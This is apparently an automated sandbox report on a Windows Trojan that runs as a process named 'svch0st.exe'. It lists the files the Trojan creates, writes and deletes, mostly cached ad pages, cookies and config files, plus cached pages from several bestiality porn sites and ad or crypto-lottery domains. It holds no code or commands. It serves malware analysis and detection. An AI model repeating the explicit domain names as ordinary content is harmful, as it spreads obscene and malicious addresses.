C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_histories.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyiclientflash.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W16263T6.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S8WLVQD9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_statistics.sxx (0 bytes)

The process svch0st.exe:3188 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\animalxxxporn_com[1].htm (9931 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7DLSY0PD.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\zooxxxfree_com[1].htm (17801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VSXW7CYA.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[5].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\marketplace.min[1].js (2162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\horse-fucking_com[1].htm (6826 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DKV2LKQG.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAPKMXHA.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA1B6AXU.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAQ2IP8F.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[10].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\E4M25RIQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAWYTHJQ.htm (1598 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[11].htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\trade[1].htm (1685 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[7].htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HLQ2ET85.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[4].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W0WR3OHC.txt (96 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCALXCOKL.htm (1319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[3].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA29BM8A.htm (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA9ZF53M.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[2].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KPIJS4AN.txt (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[3].htm (1319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NC9LUA4A.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[2].htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[1].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\view[1].htm (773 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[1].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\13BX1ZO4.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\animalpornlovers_com[1].htm (11694 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[9].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA21LIVA.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\pupfurt[1].js (3383 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[8].htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAELQCT9.htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[6].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCATLST9F.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LVD54K8A.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAKIH50N.htm (1558 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\desktop.ini (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\trade[1].htm (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA49G7SK.htm (1318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BMICP5BU.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA6O43T9.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\R2NAZKTU.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DIR5SLH7.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2S9NB1AJ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAIOPKDC.htm (509 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7DLSY0PD.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[5].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAPKMXHA.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA1B6AXU.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAQ2IP8F.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[10].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\E4M25RIQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DKV2LKQG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAWYTHJQ.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[11].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAIOPKDC.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[7].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HLQ2ET85.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[4].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCALXCOKL.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA29BM8A.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA9ZF53M.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NC9LUA4A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[9].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA21LIVA.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[8].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAELQCT9.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[6].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCATLST9F.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAKIH50N.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA49G7SK.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BMICP5BU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA6O43T9.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\R2NAZKTU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2S9NB1AJ.txt (0 bytes)

The process svch0st.exe:2632 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J89LT4OF.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906144842;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\f[1].txt (107177 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\JR8GKFX8.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[2].htm (4357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\atwho[1].css (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KT1K30BI.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\f[1].txt (32473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\8A4F0C723F1C[1].htm (1037 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9G85COVJ.txt (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\f[2].txt (45405 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[1].htm (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[2].js (183126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[3].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\8A4F0C723F1C[1].htm (1646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery.qtip[1].css (5095 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[1].js (53658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906161765;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\zenicon[1].eot (32766 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\f[1].txt (44885 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[4].htm (747 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\quant[1].js (5334 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\bnr[1].htm (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1THAFJKQ.txt (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\slide[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BD5T0HI7.txt (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\com.talker.class[1].js (650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\bnr[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\OZDIKCNB\coinsns[1].xml (595 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\geetest.5.10.0[1].js (16175 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\8A4F0C723F1C[1].htm (2336 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[1].htm (9288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\slide[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ca-pub-5722932343401905[1].js (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\magnific-popup[1].css (3573 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5FM6I276.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[1].htm (2984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[2].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[1].htm (2984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WRQMQYSP.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[1].htm (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\index[1].htm (8716 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5D0QW9Y1.txt (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\check[1].css (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[4].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\lottery[1].css (11456 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\style.3.2.0[1].css (5024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[5].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\H49OIM3X.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\script.packed[1].js (24186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[5].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[3].js (432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\zui[1].css (84707 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KZ8SJFUR.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\core[1].css (25346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\radialIndicator.min[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\c=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\zrt_lookup[1].htm (5608 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EY6YFA77.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\analytics[1].js (14647 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[4].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[5].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\geetest.0.0.0[1].js (16202 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[4].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery.iframe-transport[1].js (1298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJIU3XS6.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\lazyload[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\c=n;dst=1;et=1484906153069;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[3].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\size1[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\zui-theme[1].css (2422 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KZ8SJFUR.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J89LT4OF.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906161765;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\c=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906144842;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
